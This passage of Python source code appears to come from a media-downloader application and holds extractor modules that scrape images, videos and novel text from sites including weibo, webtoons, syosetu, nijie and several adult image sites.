html=None, cw=None): print_ = get_print(cw) if html is None: html = downloader.read_html(url) info = get_info(url, html) # Range max_pid = get_max_range(cw) ids = set() imgs = [] for p in range(1000): url_api = 'https://bcy.net/apiv3/user/selfPosts?uid={}'.format(info['uid']) if imgs: url_api += '&since={}'.format(imgs[-1].id) data_raw = downloader.read_html(url_api, url) data = json.loads(data_raw)['data'] items = data['items'] if not items: print('no items') break c = 0 for item in items: check_alive(cw) id = item['item_detail']['item_id'] if id in ids: print('duplicate') continue c += 1 ids.add(id) url_single = 'https://bcy.net/item/detail/{}'.format(id) imgs_single = get_imgs(url_single, cw=cw) print_(str(id)) for p, img in enumerate(imgs_single): img = Image(img._url, url_single, id, p) imgs.append(img) s = '{} {} - {}'.format(tr_('읽는 중...'), info['artist'], min(len(imgs), max_pid)) if cw: cw.setTitle(s) else: print(s) if len(imgs) >= max_pid: break if not c: print('not c') break if len(imgs) >= max_pid: print('over max_pid:', max_pid) break return imgs[:max_pid] File: src/extractor/nijie_downloader.py #coding: utf-8 import downloader from utils import Downloader, Session, urljoin, get_max_range, get_print, clean_title, try_n, get_ext, check_alive, File, limits, clean_url from translator import tr_ import ree as re from errors import LoginRequired import utils def get_id(url): return re.find('id=([0-9]+)', url) def isLogin(soup): if soup.find('ul', id="sub-menu"): return True return False class Downloader_nijie(Downloader): type = 'nijie' URLS = ['nijie.info'] MAX_CORE = 4 display_name = 'ニジエ' ACCEPT_COOKIES = [r'(.*\.)?nijie\.info'] def init(self): if 'members.php' not in self.url and 'members_illust.php' not in self.url: raise NotImplementedError() self.session = Session() @classmethod def fix_url(cls, url): if 'nijie.info' not in url.lower(): url = f'https://nijie.info/members.php?id={url}' return url.replace('http://', 'https://') @property def name(self): name = self.soup.find('p', class_='user_icon').find('a', class_='name').text.strip() name = f'{name} (nijie_{get_id(self.url)})' return clean_title(name) def read(self): id = get_id(self.url) self.soup = read_soup(f'https://nijie.info/members.php?id={id}', session=self.session) if not isLogin(self.soup): raise LoginRequired(method='browser', url='https://nijie.info/login.php') self.title = self.name self.urls += get_imgs(self.url, self.name, self.session, self.cw) self.title = self.name class Image(File): type = 'nijie' def get(self): url = self['referer'] if '://' not in url: return {'url': url} id = int(re.find('[?&]id=([0-9]+)', url)) url = url.replace('view.php', 'view_popup.php') #6726 soup = read_soup(url, self['rereferer'], session=self.session) view = soup.find('div', id='img_window') imgs = [] p = 0 for img in view.findAll('img'): url_img = urljoin(url, img['src']) url_img = re.sub('__rs_l[0-9]+x[0-9]+/', '', url_img) if '/filter/' in url_img: continue ext = get_ext(url_img) name = f'{id}_p{p}{ext}' imgs.append({'url': url_img, 'name': name}) p += 1 return imgs @try_n(12, sleep=lambda try_: 10+try_*10) @limits(5) def read_soup(*args, **kwargs): return downloader.read_soup(*args, **kwargs) def setPage(url, page): if 'p=' in url: url = re.sub('p=[0-9]*', f'p={page}', url) else: url += f'&p={page}' return url def get_imgs(url, title=None, session=None, cw=None): print_ = get_print(cw) url = clean_url(url) id = get_id(url) url = f'https://nijie.info/members_illust.php?id={id}' olds = utils.process_olds(Image, title, r'([0-9]+)_p', cw) ids = olds['ids'] imgs_old = olds['imgs'] # Range max_pid = get_max_range(cw) imgs = [] for p in range(1, 101): url = setPage(url, p) print_(url) soup = read_soup(url, session=session) posts = soup.findAll('div', class_='nijie') if not posts: print_('no posts') break c = 0 for post in posts: check_alive(cw) url_img = urljoin(url, post.a.attrs['href']) id_ = int(re.find(r'[&\?]id=([0-9]+)', url_img, err='no id')) if id_ in ids: continue ids.add(id_) img = Image({'referer': url_img, 'rereferer': url}) imgs.append(img) c += 1 print_(f'c: {c}') msg = f'{tr_("읽는 중...")} {title} - {len(imgs)}' if cw: cw.setTitle(msg) else: print(msg) if len(imgs) >= max_pid or c == 0: break return imgs + imgs_old File: src/extractor/rule34_xxx_downloader.py import downloader import ree as re import os from utils import Downloader, query_url, Soup, get_max_range, get_print, clean_title, try_n, check_alive, clean_url from translator import tr_ from urllib.parse import quote LIMIT = 100 def get_tags(url): url = clean_url(url) qs = query_url(url) if 'page=favorites' in url: id = qs.get('id', ['N/A'])[0] id = 'fav_{}'.format(id) else: tags = qs.get('tags', []) tags.sort() id = ' '.join(tags) if not id: id = 'N/A' return id class Downloader_rule34_xxx(Downloader): type = 'rule34_xxx' URLS = ['rule34.xxx'] MAX_CORE = 8 display_name = 'Rule34.xxx' _name = None ACCEPT_COOKIES = [r'(.*\.)?rule34\.xxx'] @classmethod def fix_url(cls, url): if 'rule34.xxx' in url.lower(): url = url.replace('http://', 'https://') else: url = url.replace(' ', '+') while '++' in url: url = url.replace('++', '+') url = quote(url) url = url.replace('%2B', '+') url = 'https://rule34.xxx/index.php?page=post&s=list&tags={}'.format(url) return url @property def name(self): if self._name is None: tags = get_tags(self.url) self._name = tags return clean_title(self._name) def read(self): self.title = self.name imgs = get_imgs(self.url, self.name, cw=self.cw) for img in imgs: self.urls.append(img.url) self.filenames[img.url] = img.filename self.title = self.name class Image: def __init__(self, id_, url): self.url = url ext = os.path.splitext(url)[1] self.filename = '{}{}'.format(id_, ext) def setPage(url, page): # Always use HTTPS url = url.replace('http://', 'https://') # Change the page if 'pid=' in url: url = re.sub('pid=[0-9]*', 'pid={}'.format(page), url) else: url += '&pid={}'.format(page) return url def get_imgs(url, title=None, cw=None): url = clean_url(url) if 's=view' in url and 'page=favorites' not in url: raise NotImplementedError('Not Implemented') if 'page=dapi' not in url.lower(): tags = get_tags(url) tags = quote(tags, safe='/') tags = tags.replace('%20', '+') url = "https://rule34.xxx/index.php?page=dapi&s=post&q=index&tags={}&pid={}&limit={}".format(tags, 0, LIMIT) print_ = get_print(cw) # Range max_pid = get_max_range(cw) imgs = [] ids = set() for p in range(500): #1017 check_alive(cw) url = setPage(url, p) print_(url) html = try_n(4, sleep=30)(downloader.read_html)(url) #3340 soup = Soup(html) posts = soup.findAll('post') if not posts: break for post in posts: id_ = post.attrs['id'] if id_ in ids: print('duplicate:', id_) continue ids.add(id_) url_img = post.attrs['file_url'] img = Image(id_, url_img) imgs.append(img) if len(imgs) >= max_pid: break if cw is not None: cw.setTitle('{} {} - {}'.format(tr_('읽는 중...'), title, len(imgs))) return imgs File: src/extractor/weibo_downloader.py #coding:utf8 import downloader import ree as re from utils import Downloader, Session, get_print, clean_title, Soup, fix_protocol, domain, get_max_range, get_ext, File, check_alive, limits from translator import tr_ import clf2 import errors import utils import dateutil.parser def suitable(url): if domain(url.lower(), 2) not in ['weibo.com', 'weibo.cn']: return False if '/tv/' in url.lower(): return False return True class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://weibo.com/login.php', w=1180) class Downloader_weibo(Downloader): type = 'weibo' URLS = [suitable] MAX_PARALLEL = 2 #6739 ACCEPT_COOKIES = [r'(.*\.)?(weibo\.com|sina\.com\.cn|weibo\.cn)'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): url = url.replace('weibo.cn', 'weibo.com').split('?')[0] if 'weibo.com/p/' in url: id = re.find(r'weibo.com/p/([^/]+)', url, err='no id') url = f'https://weibo.com/p/{id}' elif 'weibo.com/u/' in url: id = re.find(r'weibo.com/u/([^/]+)', url, err='no id') url = f'https://weibo.com/u/{id}' elif 'weibo.com/' in url: id = re.find(r'weibo.com/([^/]+)', url, err='no id') url = f'https://weibo.com/{id}' else: id = url url = f'https://weibo.com/u/{id}' return fix_protocol(url) def read(self): checkLogin(self.session) uid, oid, name = get_id(self.url, self.cw) title = clean_title(f'{name} (weibo_{uid})') self.urls += get_imgs(uid, title, self.session, cw=self.cw) self.title = title def checkLogin(session): c = session.cookies._cookies.get('.weibo.com', {}).get('/',{}).get('SUBP') if not c or c.is_expired(): raise LoginRequired() class Album: def __init__(self, id, type): self.id = id self.type = type @limits(1) def wait(): pass class Image(File): type = 'weibo' format = '[date] id_ppage' def _get_page_id(html): return re.find(r"CONFIG\['page_id'\]='([0-9]+)'", html) or re.find(r'/u/page/follow/([0-9]+)', html) def get_id(url, cw=None): for try_ in range(2): try: res = clf2.solve(url, cw=cw, f=_get_page_id) html = res['html'] soup = Soup(html) if soup.find('div', class_='gn_login') or soup.find('a', class_=lambda c: c and c.startswith('LoginBtn')): raise LoginRequired() oid = _get_page_id(html) if not oid: raise Exception('no page_id') uids = re.findall(r'uid=([0-9]+)', html) uid = max(set(uids), key=uids.count) name = re.find(r"CONFIG\['onick'\]='(.+?)'", html) or soup.find('div', class_=lambda c:c and c.startswith('ProfileHeader_name')).text.strip() if not name: raise Exception('no name') break except errors.LoginRequired as e: raise e except Exception as e: e_ = e print(e) else: raise e_ return uid, oid, name def extract_video(d): return d.get('stream_url_hd') or d['stream_url'] def get_imgs(uid, title, session, cw=None): #6739 print_ = get_print(cw) print_(f'uid: {uid}') olds = utils.process_olds(Image, title, r'([0-9]+)_p', cw) mids = olds['ids'] imgs_old = olds['imgs'] referer = f'https://weibo.com/u/{uid}?tabtype=album' imgs = [] sinceid = None while check_alive(cw): if sinceid: url_api = f'https://weibo.com/ajax/profile/getImageWall?uid={uid}&sinceid={sinceid}' else: url_api = f'https://weibo.com/ajax/profile/getImageWall?uid={uid}&sinceid=0&has_album=true' wait() d = downloader.read_json(url_api, referer, session=session) sinceid = d['data']['since_id'] for item in d['data']['list']: mid = int(item['mid']) if mid in mids: #print_(f'dup: {mid}') continue mids.add(mid) url_api = f'https://weibo.com/ajax/statuses/show?id={mid}' wait() d = downloader.read_json(url_api, referer, session=session) if d.get('ok') != 1: print_(f'skip: {mid}') continue date = dateutil.parser.parse(d['created_at']) structs = [d] + (d.get('url_struct') or []) for struct in structs: media_info = struct.get('mix_media_info', {}).get('items') or (struct.get('pic_infos').values() if 'pic_infos' in struct else None) #6739 if media_info: break else: print_(f'no media: {mid}') #6739 continue for p, item in enumerate(media_info): if data := item.get('data'): type = item.get('type') if type == 'video': img = extract_video(data['media_info']) elif type == 'pic': img = data['largest']['url'] else: raise Exception(f'media type: {type}') else: img = item['largest']['url'] ext = get_ext(img) d = { 'date': date, 'id': mid, 'page': p, } filename = utils.format('weibo', d, ext) img = Image({'referer': referer, 'url': img, 'name': filename}) imgs.append(img) cw.setTitle(f'{tr_("읽는 중...")} {title} - {len(imgs)}') if not sinceid: break if len(imgs) >= get_max_range(cw): break return imgs + imgs_old File: src/extractor/youku_downloader.py import downloader import ytdl from m3u8_tools import M3u8_stream from utils import LazyUrl, Downloader, format_filename from io import BytesIO class Downloader_youku(Downloader): type = 'youku' single = True URLS = ['v.youku.com'] ACCEPT_COOKIES = [r'(.*\.)?youku\.com'] def read(self): video = Video(self.url, cw=self.cw) video.url()# get thumb self.urls.append(video.url) self.setIcon(video.thumb) self.title = video.title class Video: _url = None def __init__(self, url, cw=None): self.url = LazyUrl(url, self.get, self) self.cw = cw def get(self, url): if self._url: return self._url ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) # get best video fs = info['formats'] fs = sorted(fs, key=lambda x: int(x['width']), reverse=True) f = fs[0] url_video = f['url'] # thumb self.thumb_url = info['thumbnails'][0]['url'] self.thumb = BytesIO() downloader.download(self.thumb_url, buffer=self.thumb) # m3u8 print(f['protocol']) if 'm3u8' in f['protocol']: url_video = M3u8_stream(url_video, referer=url) # title & filename self.title = info['title'] self.filename = format_filename(self.title, info['id'], '.mp4') self._url = url_video return self._url File: src/extractor/hentaicosplay_downloader.py #coding: utf8 import downloader from utils import Downloader, Session, Soup, LazyUrl, urljoin, get_ext, clean_title, try_n, limits import utils import ree as re from translator import tr_ import clf2 from m3u8_tools import M3u8_stream from timee import sleep import os class Image: def __init__(self, url, referer, p, session): self._url = url self._referer = referer self._p = p self.url = LazyUrl(url, self.get, self) self.session = session @try_n(3, 5) @limits(1) def get(self, _=None): soup = downloader.read_soup(self._url, self._referer, session=self.session) div = soup.find('div', id='display_image_detail') or soup.find('ul', id='detail_list') parent = div.find('img').parent while not parent.get('href'): parent = parent.parent url = urljoin(self._url, parent['href']) ext = get_ext(url) self.filename = '{:04}{}'.format(self._p, ext) return url, self._url class Video: def __init__(self, src, referer, title, session): ext = get_ext(src) if ext == '.m3u8': _src = src src = M3u8_stream(_src, referer=referer, session=session) ext = '.mp4' self.url = LazyUrl(referer, lambda _: src, self) self.filename = '{}{}'.format(clean_title(title), ext) class Downloader_hentaicosplay(Downloader): type = 'hentaicosplay' URLS = ['hentai-cosplays.com', 'porn-images-xxx.com', 'hentai-img.com'] icon = None display_name = 'Hentai Cosplay' MAX_PARALLEL = 1 # must be 1 MAX_CORE = 4 ACCEPT_COOKIES = [rf'(.*\.)?{domain}' for domain in URLS] @classmethod def fix_url(cls, url): url = re.sub(r'/page/[0-9]+', '', url) url = re.sub(r'/attachment/[0-9]+', '', url) url = re.sub(r'([a-zA-Z]+\.)hentai-cosplays\.com', 'hentai-cosplays.com', url) url = re.sub(r'.com/story/', '.com/image/', url) return url def init(self): self.session = Session() @try_n(2) def read(self): #4961 ua = downloader.random_ua() self.print_(f'read start ua: {ua}') downloader.REPLACE_UA[r'hentai-cosplays\.com'] = ua downloader.REPLACE_UA[r'porn-images-xxx\.com'] = ua if '/video/' in self.url: res = clf2.solve(self.url, session=self.session, cw=self.cw) soup = Soup(res['html']) title = (soup.find('h1', id='post_title') or soup.find('div', id='page').find('h2')).text.strip() self.title = title view = soup.find('div', id='post') or soup.find('div', class_='video-container') video = view.find('video') src = video.find('source')['src'] src = urljoin(self.url, src) video = Video(src, self.url, title, self.session) self.urls.append(video.url) self.single = True return if '/image/' not in self.url: raise NotImplementedError('Not a post') res = clf2.solve(self.url, session=self.session, cw=self.cw) soup = Soup(res['html']) title = (soup.find('h2') or soup.find('h3')).text paginator = soup.find('div', id='paginator') or soup.find('div', class_='paginator_area') pages = [self.url] for a in paginator.findAll('a'): href = a.get('href') if not href: continue href = urljoin(self.url, href) if href not in pages: pages.append(href) self.print_(f'pages: {len(pages)}') imgs = [] for i, page in enumerate(pages): sleep(2, self.cw) if page == self.url: soup_page = soup else: soup_page = try_n(3, 5)(downloader.read_soup)(page, session=self.session) view = soup_page.find('div', id='post') or soup_page.find('ul', id='detail_list') for img in view.findAll('img'): href = img.parent.get('href') or img.parent.parent.get('href') if not href: continue href = urljoin(page, href) img = Image(href, page, len(imgs), self.session) imgs.append(img) self.print_(f'imgs: {len(imgs)}') self.cw.setTitle('{} {} ({} / {})'.format(tr_('읽는 중...'), title, i+1, len(pages))) names = {} dirname = utils.dir(self.type, clean_title(title), self.cw) try: files = os.listdir(dirname) except: files = [] for file in files: name, ext = os.path.splitext(file) names[name] = ext for p, img in enumerate(imgs): name = '{:04}'.format(p) ext = names.get(name) if ext: self.urls.append(os.path.join(dirname, '{}{}'.format(name, ext))) else: self.urls.append(img.url) self.title = clean_title(title) File: src/extractor/tokyomotion_downloader.py #coding:utf8 import downloader from utils import Soup, Downloader, LazyUrl, clean_title, format_filename from io import BytesIO import ree as re import os class Downloader_tokyomotion(Downloader): type = 'tokyomotion' URLS = ['tokyomotion.net'] single = True _type = None display_name = 'TOKYO Motion' ACCEPT_COOKIES = [r'(.*\.)?tokyomotion\.net'] def init(self): html = downloader.read_html(self.url) self.soup = Soup(html) if '/album/' in self.url: self._type = 'album' else: self._type = 'video' @property def name(self): title = get_title(self.soup) return clean_title(title) def read(self): if self._type == 'video': video = get_video(self.url, self.soup) self.urls.append(video.url) self.setIcon(video.thumb) elif self._type == 'album': imgs = get_imgs(self.url) for img in imgs: self.urls.append(img.url) self.single = False else: raise NotImplementedError('Unknown type: {}'.format(self._type)) self.title = self.name class Video: def __init__(self, url, url_thumb, referer, filename): self.url = LazyUrl(referer, lambda x: url, self) self.url_thumb = url_thumb self.thumb = BytesIO() downloader.download(url_thumb, referer=referer, buffer=self.thumb) self.filename = filename def get_title(soup): video = soup.find('video', id='vjsplayer') if video: title = soup.find('h3').text.strip() else: title = soup.find('title').text.split(' Album - ')[0].strip() return title def get_video(url, soup=None): if soup is None: html = downloader.read_html(url) soup = Soup(html) video = soup.find('video', id='vjsplayer').find('source').attrs['src'] url_thumb = soup.find('video', id='vjsplayer').attrs['poster'] title = get_title(soup) filename = format_filename(title, '', '.mp4') video = Video(video, url_thumb, url, filename) return video class Image: def __init__(self, url, referer): self.url = LazyUrl(referer, lambda x: url, self) self.filename = os.path.basename(url.split('?')[0]) def get_imgs(url): id = re.find('album/.*?([0-9]+)', url) print('id:', id) url = 'https://www.tokyomotion.net/album/slideshow/{}'.format(id) html = downloader.read_html(url) soup = Soup(html) imgs = [] for a in soup.findAll('a', {'data-lightbox': 'slideshow-{}'.format(id)}): img = a.find('img').attrs['src'] img = img.replace('/tmb/', '/') img = Image(img, url) imgs.append(img) return imgs File: src/extractor/syosetu_downloader.py #coding:utf8 import downloader import utils from utils import urljoin, try_n, Downloader, clean_title, Session, File, check_alive, get_max_range import ree as re from io import BytesIO import os from translator import tr_ from timee import sleep class Text(File): type = 'syosetu' format = 'title' def __init__(self, info): title = info['subtitle'] if not info['single']: p = int(re.findall('/([0-9]+)', info['referer'])[-1]) title = clean_title(f'[{p:04}] {title}') info['title_all'] = title d = { 'title': info['title_all'], } info['name'] = utils.format(self.type, d, '.txt') super().__init__(info) def get(self): text = get_text(self['referer'], self['title_all'], self['update'], self.session) f = BytesIO() f.write(text.encode('utf8')) f.seek(0) return {'url': f} def get_id(url): return re.find(r'.com/([^/]+)', url) or url class Downloader_syosetu(Downloader): type = 'syosetu' URLS = ['syosetu.com'] MAX_CORE = 2 detect_removed = False display_name = '小説家になろう' ACCEPT_COOKIES = [r'(.*\.)?syosetu\.com'] atts = ['_title_', 'novel_ex'] @classmethod def fix_url(cls, url): return f'https://ncode.syosetu.com/{get_id(url)}/' def read(self): for try_ in range(8): self.print_('get_session') try: self.session = get_session() self.purge_cookies() soup = downloader.read_soup(self.url, session=self.session) get_title_artist(soup) break except Exception as e: print(e) else: raise title, self.artist = get_title_artist(soup) self._title_ = title ncode = re.find(r'syosetu.com/([^/]+)', self.url, err='no ncode') #3938 title_dir = clean_title(f'[{self.artist}] {title} ({ncode})') ex = soup.find('div', id='novel_ex') self.novel_ex = utils.get_text(ex, '') if ex else None texts = [] # Range max_pid = get_max_range(self.cw) while check_alive(self.cw): subtitles = soup.findAll('dd', class_='subtitle') if subtitles: for subtitle in subtitles: update = subtitle.parent.find('dt', class_='long_update') update2 = None if update: for span in update.findAll('span'): update2 = span.attrs['title'] span.decompose() update = update.text.strip() if update2: update += f' ({update2})' a = subtitle.find('a') subtitle = a.text.strip() href = urljoin(self.url, a.attrs['href']) if not re.search(f'ncode.syosetu.com/{get_id(self.url)}/[0-9]+', href): self.print_(f'skip: {href}') continue text = Text({'referer': href, 'subtitle': subtitle, 'update': update, 'single': False}) texts.append(text) else: self.single = True text = Text({'referer': self.url, 'subtitle': title_dir, 'update': None, 'single': True}) texts.append(text) if len(texts) >= max_pid: break if pager_next := soup.find('a', class_='novelview_pager-next'): #6830 sleep(1) url_next = urljoin(self.url, pager_next['href']) self.print_(f'url_next: {url_next}') soup = downloader.read_soup(url_next, self.url, session=self.session) else: break self.print_(f'single: {self.single}') self.urls += texts self.title = title_dir def post_processing(self): if self.single: return names = self.cw.names filename = os.path.join(self.dir, f'[merged] {self.title}.txt') try: with utils.open(filename, 'wb') as f: f.write(f' {self._title_}\n\n \u4f5c\u8005\uff1a{self.artist}\n\n\n'.encode('utf8')) if self.novel_ex: f.write(self.novel_ex.encode('utf8')) for i, file in enumerate(names): self.cw.pbar.setFormat(f'[%v/%m] {tr_("병합...")} [{i}/{len(names)}]') with open(file, 'rb') as f_: text = f_.read() f.write(b'\n\n\n\n') f.write(text) finally: self.cw.pbar.setFormat("[%v/%m]") def get_title_artist(soup): artist = soup.find('div', class_='novel_writername').text.replace('\u4f5c\u8005', '').replace('\uff1a', '').replace(':', '').replace('\u3000', ' ').strip() rem = len(artist.encode('utf8', 'ignore')) + len('[merged] [] .txt') + len(' (n8273ds)') return clean_title(soup.find('p', class_='novel_title').text.strip(), n=-rem), clean_title(artist) @try_n(22, sleep=30) def get_text(url, subtitle, update, session): soup = downloader.read_soup(url, session=session) if update: update = ' ' + update else: update = '' story = utils.get_text(soup.find('div', id='novel_honbun'), '') p = soup.find('div', id='novel_p') p = '' if p is None else utils.get_text(p, '') if p: story = f'{p}\n\n════════════════════════════════\n\n{story}' #2888 a = soup.find('div', id='novel_a') a = '' if a is None else utils.get_text(a, '') if a: story = f'{story}\n\n════════════════════════════════\n\n{a}' text = f'''──────────────────────────────── ◆ {subtitle}{update} ──────────────────────────────── {story}''' return text def get_session(): session = Session() session.cookies.set(name='over18', value='yes', path='/', domain='.syosetu.com') return session File: src/extractor/bdsmlr_downloader.py #coding:utf8 import downloader from utils import Session, Soup, LazyUrl, Downloader, get_max_range, try_n, get_print, clean_title, check_alive from datetime import datetime import ree as re import os from translator import tr_ from error_printer import print_error import clf2 import errors class Downloader_bdsmlr(Downloader): type = 'bdsmlr' URLS = ['bdsmlr.com'] display_name = 'BDSMlr' ACCEPT_COOKIES = [r'(.*\.)?bdsmlr\.com'] def init(self): if 'bdsmlr.com/post/' in self.url: raise errors.Invalid(tr_('개별 다운로드는 지원하지 않습니다: {}').format(self.url)) self.url = 'https://{}.bdsmlr.com'.format(self.id_) self.session = Session() clf2.solve(self.url, session=self.session, cw=self.cw) @property def id_(self): url = self.url if 'bdsmlr.com' in url: if 'www.bdsmlr.com' in url: raise Exception('www.bdsmlr.com') gal_num = url.split('.bdsmlr.com')[0].split('/')[(-1)] else: gal_num = url return gal_num def read(self): info = get_imgs(self.id_, session=self.session, cw=self.cw) for post in info['posts']: self.urls.append(post.url) self.title = '{} (bdsmlr_{})'.format(clean_title(info['username']), self.id_) class Post: def __init__(self, url, referer, id, p): self.id = id self.url = LazyUrl(referer, lambda x: url, self) ext = os.path.splitext(url)[1] self.filename = '{}_p{}{}'.format(id, p, ext) def foo(url, soup, info, reblog=False): #print('foo', info['c'], len(info['ids'])) for post in soup.findAll('div', class_='wrap-post'): try: id = int(re.find('[0-9]+', post.attrs['class'][1])) except Exception as e: print(print_error(e)) continue if id in info['ids']: continue info['ids'].add(id) info['last'] = id if not reblog and post.find('div', class_='ogname'): continue for p, mag in enumerate(post.findAll(['a', 'div'], class_='magnify')): post = Post(mag.attrs['href'], url, id, p) info['posts'].append(post) info['c'] += 20 if info['c'] else 5 @try_n(2) def get_imgs(user_id, session, cw=None): print_ = get_print(cw) url = 'https://{}.bdsmlr.com/'.format(user_id) info = {'c': 0, 'posts': [], 'ids': set()} html = downloader.read_html(url, session=session) soup = Soup(html) sorry = soup.find('div', class_='sorry') if sorry: raise Exception(sorry.text.strip()) username = soup.find('title').text.strip()### print('username:', username) info['username'] = username token = soup.find('meta', {'name': 'csrf-token'}).attrs['content'] print_('token: {}'.format(token)) max_pid = get_max_range(cw) n = len(info['ids']) for p in range(1000): check_alive(cw) if p == 0: url_api = 'https://{}.bdsmlr.com/loadfirst'.format(user_id) else: url_api = 'https://{}.bdsmlr.com/infinitepb2/{}'.format(user_id, user_id) data = { 'scroll': str(info['c']), 'timenow': datetime.now().strftime('%Y-%m-%d %H:%M:%S'), } if 'last' in info: data['last'] = str(info['last']) print_('n:{}, scroll:{}, last:{}'.format(len(info['posts']), data['scroll'], data.get('last'))) headers = { 'Referer': url, 'X-CSRF-TOKEN': token, } _e = None for try_ in range(4): try: r = session.post(url_api, data=data, headers=headers) if p == 0: r.raise_for_status() break except Exception as e: _e = e print(e) else: if _e is not None: raise _e soup = Soup(r.text) foo(url, soup, info) if len(info['ids']) == n: print('same; break') break n = len(info['ids']) s = '{} {} (tumblr_{}) - {}'.format(tr_('읽는 중...'), username, user_id, len(info['posts'])) if cw is not None: cw.setTitle(s) else: print(s) if len(info['posts']) > max_pid: break return info File: src/extractor/webtoon_downloader.py import downloader from utils import Soup, Session, LazyUrl, clean_title, get_ext, get_imgs_already, urljoin, try_n, Downloader, check_alive import page_selector from translator import tr_ import ree as re import clf2 class Downloader_webtoon(Downloader): type = 'webtoon' URLS = ['webtoon.com', 'webtoons.com'] MAX_CORE = 8 MAX_SPEED = 4.0 display_name = 'WEBTOON' ACCEPT_COOKIES = [r'(.*\.)?webtoons?\.com'] def init(self): self.session = Session() clf2.solve(self.url, session=self.session) self.url = get_main(self.url, self.session) self.soup = downloader.read_soup(self.url, session=self.session) @classmethod def fix_url(cls, url): return url.replace('webtoon.com', 'webtoons.com') def read(self): title = clean_title(self.soup.find('h1').text.strip()) self.title = tr_('읽는 중... {}').format(title) imgs = get_imgs_all(self.url, self.session, title, cw=self.cw) for img in imgs: if isinstance(img, Image): self.urls.append(img.url) else: self.urls.append(img) self.title = title class Page: def __init__(self, url, title): self.url = url self.title = title class Image: def __init__(self, url, session, page, p): ext = get_ext(url) or downloader.get_ext(url, referer=page.url, session=session) self.filename = '{}/{:04}{}'.format(clean_title(page.title), p, ext) self.url = LazyUrl(page.url, lambda _: url, self) @try_n(2) def get_imgs(page, session): html = downloader.read_html(page.url, session=session) if 'window.__motiontoonViewerState__' in html: raise NotImplementedError('motiontoon') soup = Soup(html) view = soup.find('div', class_='viewer_img') imgs = [] for img in view.findAll('img'): src = img.get('data-url') or img['src'] img = Image(urljoin(page.url, src), session, page, len(imgs)) imgs.append(img) return imgs def get_main(url, session): if 'episode_no=' in url: soup = downloader.read_soup(url, session=session) url = urljoin(url, soup.find('div', class_='subj_info').find('a')['href']) return url def set_page(url, p): if '&page=' not in url: url = url + '&page={}'.format(p) else: url = re.sub('&page=[0-9]+', '&page={}'.format(p), url) if p == 1: url = url.replace('&page=1', '') return url def get_pages(url, session=None): pages = [] urls = set() for p in range(1, 101): url_page = set_page(url, p) print(url_page) for try_ in range(4): try: soup = downloader.read_soup(url_page, session=session) view = soup.find('ul', id='_listUl') if view is None: raise Exception('no view') break except Exception as e: e_ = e print(e) else: raise e_ pages_new = [] for li in view.findAll('li', recursive=False): href = urljoin(url, li.find('a')['href']) title = li.find('span', class_='subj').text.strip() if href in urls: continue urls.add(href) no = int(li['data-episode-no']) title = '{:04} - {}'.format(no, title) page = Page(href, title) pages_new.append(page) if not pages_new: break pages += pages_new return pages[::-1] @page_selector.register('webtoon') @try_n(4) def f(url): url = get_main(url, None) return get_pages(url) def get_imgs_all(url, session, title, cw=None): pages = get_pages(url, session) pages = page_selector.filter(pages, cw) imgs = [] for p, page in enumerate(pages): check_alive(cw) imgs_already = get_imgs_already('webtoon', title, page, cw) if imgs_already: imgs += imgs_already continue imgs += get_imgs(page, session) msg = tr_('읽는 중... {} / {} ({}/{})').format(title, page.title, p + 1, len(pages)) if cw is not None: cw.setTitle(msg) else: print(msg) return imgs File: src/extractor/avgle_downloader.py #coding: utf8 import downloader from m3u8_tools import M3u8_stream from utils import Soup, Downloader, LazyUrl, get_print, try_n, check_alive, format_filename, json from io import BytesIO import base64 import webbrowser import errors class Downloader_avgle(Downloader): type = 'avgle' single = True URLS = ['avgle.com'] ACCEPT_COOKIES = [r'(.*\.)?avgle\.com'] def init(self): if not self.cw.data_: link = 'https://github.com/KurtBestor/Hitomi-Downloader/wiki/Chrome-Extension' webbrowser.open(link) raise errors.Invalid('No data; See: {}'.format(link)) def read(self): video = get_video(self.url, cw=self.cw) self.urls.append(video.url) self.setIcon(video.thumb) self.title = video.title @try_n(2) def get_video(url, cw=None): print_ = get_print(cw) check_alive(cw) data = cw.data_ version = data['version'] print_('version: {}'.format(version)) if version == '0.1': raise errors.OutdatedExtension() data = data['data'] if not isinstance(data, bytes): data = data.encode('utf8') s = base64.b64decode(data).decode('utf8') urls = json.loads(s) print_('\n'.join(urls[:4])) referer_seg = 'auto' if 'referer=force' in urls[0] else None # 1718 stream = M3u8_stream(url, urls=urls, n_thread=4, referer_seg=referer_seg) html = downloader.read_html(url) soup = Soup(html) url_thumb = soup.find('meta', {'property': 'og:image'}).attrs['content'] title = soup.find('meta', {'property': 'og:title'}).attrs['content'].strip() video = Video(stream, url_thumb, url, title) return video class Video: def __init__(self, url, url_thumb, referer, title): self.url = LazyUrl(referer, lambda x: url, self) self.url_thumb = url_thumb self.thumb = BytesIO() downloader.download(url_thumb, referer=referer, buffer=self.thumb) self.title = title self.filename = format_filename(title, '', '.mp4') File: src/extractor/nhentai_downloader.py #coding:utf8 import downloader import ree as re from utils import urljoin, File, Downloader, try_n, join, get_ext, json import utils import clf2 def get_id(url): try: return int(url) except: return int(re.find('/g/([0-9]+)', url)) class File_nhentai(File): type = 'nhentai' format = 'page:04;' class Downloader_nhentai(Downloader): type = 'nhentai' URLS = ['nhentai.net'] MAX_CORE = 16 display_name = 'nhentai' ACCEPT_COOKIES = [r'(.*\.)?nhentai\.net'] def init(self): self.session = clf2.solve(self.url, cw=self.cw)['session'] #4541 @classmethod def fix_url(cls, url): return f'https://nhentai.net/g/{get_id(url)}/' def read(self): info, imgs = get_imgs(get_id(self.url), self.session) # 1225 artist = join(info.artists) self.artist = artist if info.artists else None group = join(info.groups) lang = info.lang or 'N/A' series = info.seriess[0] if info.seriess else 'N/A' title = self.format_title(info.type, info.id, info.title, artist, group, series, lang) self.urls += imgs self.title = title class Info: def __init__(self, host, id, id_media, title, p, artists, groups, seriess, lang, type, formats): self.host = host self.id = id self.id_media = id_media self.title = title self.p = p self.artists = artists self.groups = groups self.seriess = seriess self.lang = lang self.type = type self.formats = formats @try_n(4) def get_info(id, session): url = f'https://nhentai.net/g/{id}/1/' referer = f'https://nhentai.net/g/{id}/' html = downloader.read_html(url, referer, session=session) data = html.split('JSON.parse(')[1].split(');')[0] gal = json.loads(json.loads(data)) host = 'https://i.nhentai.net'#re.find('''media_url: *['"]([^'"]+)''', html, err='no host') id = int(gal['id']) id_media = int(gal['media_id']) title = gal['title']['english'] p = len(gal['images']['pages']) artists 